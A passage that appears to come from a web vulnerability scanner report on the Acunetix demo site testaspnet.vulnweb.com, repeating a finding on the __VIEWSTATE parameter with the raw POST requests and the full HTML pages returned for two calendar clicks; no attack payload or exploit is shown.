</TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8200&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAMtOYTdoIZGRkuH5Mfcuev3bPYoGoYzrBVcBMiLw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKcifT4BgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w92p0ME8SklQw5ep8m%2FTMSd%2BksJIA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:01 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAMtOYTdoIZGRkuH5Mfcuev3bPYoGoYzrBVcBMiLw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKcifT4BgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w92p0ME8SklQw5ep8m/TMSd+ksJIA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:White" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8188&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAPdYqRNoIZGRkCv5oXNV7I47cyprtHoSqTxvhKKo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKrpb2MDQK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9PJHrivj12qLRWomGoKk9a%2Fja6PQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:10 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAPdYqRNoIZGRkCv5oXNV7I47cyprtHoSqTxvhKKo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKrpb2MDQK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9PJHrivj12qLRWomGoKk9a/ja6PQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:White" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> 